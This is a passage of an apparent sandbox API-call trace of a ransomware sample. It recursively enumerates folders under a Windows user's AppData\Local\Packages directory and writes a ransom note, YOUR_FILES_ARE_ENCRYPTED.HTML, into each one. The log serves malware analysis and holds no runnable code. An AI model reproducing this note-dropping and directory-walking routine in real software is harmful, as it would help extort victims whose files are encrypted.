hFindFile=0x6268f8) returned 1 [0121.851] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 118 [0121.852] GetProcessHeap () returned 0x600000 [0121.852] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.852] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.purchasedialog_cw5n1h2txyewy\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0121.852] WriteFile (in: hFile=0x31c, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.853] CloseHandle (hObject=0x31c) returned 1 [0121.853] GetProcessHeap () returned 0x600000 [0121.854] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.854] GetProcessHeap () returned 0x600000 [0121.854] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.854] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab409029, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab409029, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab409029, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0121.854] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.854] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AppData") returned 93 [0121.854] GetProcessHeap () returned 0x600000 [0121.854] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.854] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AppData" [0121.854] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AppData\\*" [0121.854] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab409029, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab409029, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab409029, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31884bc, dwReserved1=0x3188410, cFileName=".", cAlternateFileName="")) returned 0x626878 [0121.854] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab409029, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab409029, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab409029, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31884bc, dwReserved1=0x3188410, cFileName="..", cAlternateFileName="")) returned 1 [0121.854] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab409029, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab409029, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab409029, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31884bc, dwReserved1=0x3188410, cFileName="..", cAlternateFileName="")) returned 0 [0121.855] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0121.855] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0121.855] GetProcessHeap () returned 0x600000 [0121.855] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.855] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.purchasedialog_cw5n1h2txyewy\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0121.855] WriteFile (in: hFile=0x31c, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.856] CloseHandle (hObject=0x31c) returned 1 [0121.856] GetProcessHeap () returned 0x600000 [0121.856] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.856] GetProcessHeap () returned 0x600000 [0121.856] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.856] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab3e2e5c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab3e2e5c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab3e2e5c, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0121.856] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.856] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\LocalCache") returned 96 [0121.856] GetProcessHeap () returned 0x600000 [0121.856] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.857] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\LocalCache" [0121.857] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\LocalCache\\*" [0121.857] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab3e2e5c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab3e2e5c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab3e2e5c, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31884bc, dwReserved1=0x3188410, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0121.857] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab3e2e5c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab3e2e5c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab3e2e5c, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31884bc, dwReserved1=0x3188410, cFileName="..", cAlternateFileName="")) returned 1 [0121.857] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab3e2e5c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab3e2e5c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab3e2e5c, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31884bc, dwReserved1=0x3188410, cFileName="..", cAlternateFileName="")) returned 0 [0121.857] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0121.857] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0121.857] GetProcessHeap () returned 0x600000 [0121.857] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.857] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.purchasedialog_cw5n1h2txyewy\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0121.858] WriteFile (in: hFile=0x31c, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.859] CloseHandle (hObject=0x31c) returned 1 [0121.859] GetProcessHeap () returned 0x600000 [0121.859] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.859] GetProcessHeap () returned 0x600000 [0121.859] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.859] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab3706b2, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab3706b2, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab3706b2, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0121.860] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.860] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\LocalState") returned 96 [0121.860] GetProcessHeap () returned 0x600000 [0121.860] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.860] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\LocalState" [0121.860] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\LocalState\\*" [0121.860] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab3706b2, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab3706b2, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab3706b2, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31884bc, dwReserved1=0x3188410, cFileName=".", cAlternateFileName="")) returned 0x626838 [0121.861] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab3706b2, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab3706b2, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab3706b2, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31884bc, dwReserved1=0x3188410, cFileName="..", cAlternateFileName="")) returned 1 [0121.861] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab3706b2, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab3706b2, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab3706b2, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31884bc, dwReserved1=0x3188410, cFileName="..", cAlternateFileName="")) returned 0 [0121.861] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0121.861] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0121.861] GetProcessHeap () returned 0x600000 [0121.861] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.861] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.purchasedialog_cw5n1h2txyewy\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0121.862] WriteFile (in: hFile=0x31c, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.863] CloseHandle (hObject=0x31c) returned 1 [0121.863] GetProcessHeap () returned 0x600000 [0121.863] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.863] GetProcessHeap () returned 0x600000 [0121.863] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.863] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab396ad7, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab396ad7, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab396ad7, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0121.863] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.863] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\RoamingState") returned 98 [0121.863] GetProcessHeap () returned 0x600000 [0121.863] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.863] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\RoamingState" [0121.863] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\RoamingState\\*" [0121.863] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab396ad7, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab396ad7, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab396ad7, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31884bc, dwReserved1=0x3188410, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0121.863] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab396ad7, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab396ad7, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab396ad7, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31884bc, dwReserved1=0x3188410, cFileName="..", cAlternateFileName="")) returned 1 [0121.863] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab396ad7, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab396ad7, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab396ad7, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31884bc, dwReserved1=0x3188410, cFileName="..", cAlternateFileName="")) returned 0 [0121.863] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0121.863] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 128 [0121.863] GetProcessHeap () returned 0x600000 [0121.863] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.863] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.purchasedialog_cw5n1h2txyewy\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0121.864] WriteFile (in: hFile=0x31c, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.865] CloseHandle (hObject=0x31c) returned 1 [0121.865] GetProcessHeap () returned 0x600000 [0121.865] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.865] GetProcessHeap () returned 0x600000 [0121.865] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.865] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab3e2e5c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab409029, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab409029, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0121.865] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.865] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Settings") returned 94 [0121.865] GetProcessHeap () returned 0x600000 [0121.865] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.865] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Settings" [0121.865] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Settings\\*" [0121.865] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab3e2e5c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab409029, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9557058c, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31884bc, dwReserved1=0x3188410, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0121.866] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab3e2e5c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab409029, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9557058c, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31884bc, 